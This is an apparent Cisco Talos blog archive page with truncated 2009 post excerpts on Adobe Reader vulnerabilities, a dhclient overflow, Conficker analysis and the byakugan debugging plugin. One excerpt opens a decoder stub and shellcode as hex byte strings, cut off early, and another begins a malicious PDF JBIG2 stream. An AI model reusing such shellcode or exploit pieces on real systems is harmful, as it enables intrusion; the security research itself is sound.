Cisco Talos Blog

July 24, 2009 12:08

Adobe 0-day update

We love adobe. We love the u30. We love 32 bit values that are encoded as somewhere between 1 and 5 bytes. This is certainly a file format which has outlasted it's day in the sun. (56k modems) Here Adobe mentions a CVE. Keep that in mind. Yesterday, they locked a bug you mi

July 22, 2009 12:56

Don’t read this post

So Lurene is mad at me, me being Matt W. The reason for this is the following conversation. Me: Hey you guys see the US-CERT notice on ISC dhclient overflow? Lurene: Yup, working on coverage right now for release today. Lurene: You do know this vuln is awesome right? Me: How so?

February 22, 2009 12:55

Homebrew patch for Adobe AcroReader 9

People seemed a bit worred about the Adobe Reader bug, so I figured I'd take a bit of time this morning and create a home brew patch for people to protect themselves with until March 11th rolls around. The patch is just a replacement DLL - AcroRd32.dll to be precise. Take th

February 20, 2009 17:29

Have a nice weekend! (PDF love)

Maybe you read Michael Howard's twitter feed. If so, you may be wondering why you were asked to turn off Javascript in Adobe Acrobat Reader. Well, I'm here to tell you that if you were to load a PDF file with an embedded JBIG2 image stream: << /Type /XObject /Subty

February 19, 2009 14:28

Making Conficker Cough Up the Goods

I'm not a malware gal. I really dislike analyzing the stuff. It could be an artifact of a life spent pulling apart Microsoft binaries. When Microsoft releases a binary, everything looks the same; it's not a challenge to figure out what's going on. The only challenge i

January 16, 2009 12:48

Update to byakugan’s identBuf and memDiff functionality

I've added the ability to import files into tracked buffers, and also added the ability to make use of them as a memDiff input type. This means a new format for the !jutsu identBuf command: !jutsu identBuf TYPE NAME [VALUE SIZE] Depending on the TYPE, the rest of the comman

January 15, 2009 16:56

!jutsu memDiff

On request, I've added a memory diffing function to byakugan, which will allow you to compare a segment of memory to any buffer that's tracked with identBuf. Shortly I'll be adding the ability to pull buffers in from files, and even directly from metasploit through a

January 14, 2009 14:56

Preventing Shong from getting her CISSP

================== ================== $decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .        "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff"; $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x

January 7, 2009 14:49

New byakugan functionality!

I've just added a new jutsu method to byakugan to help you find the address of a particular primitive (DWORD, WORD, or BYTE) in memory. Obviously, this isn't a terribly difficult task - you use the search function in windbg. What trackVal will do for you is allow you to s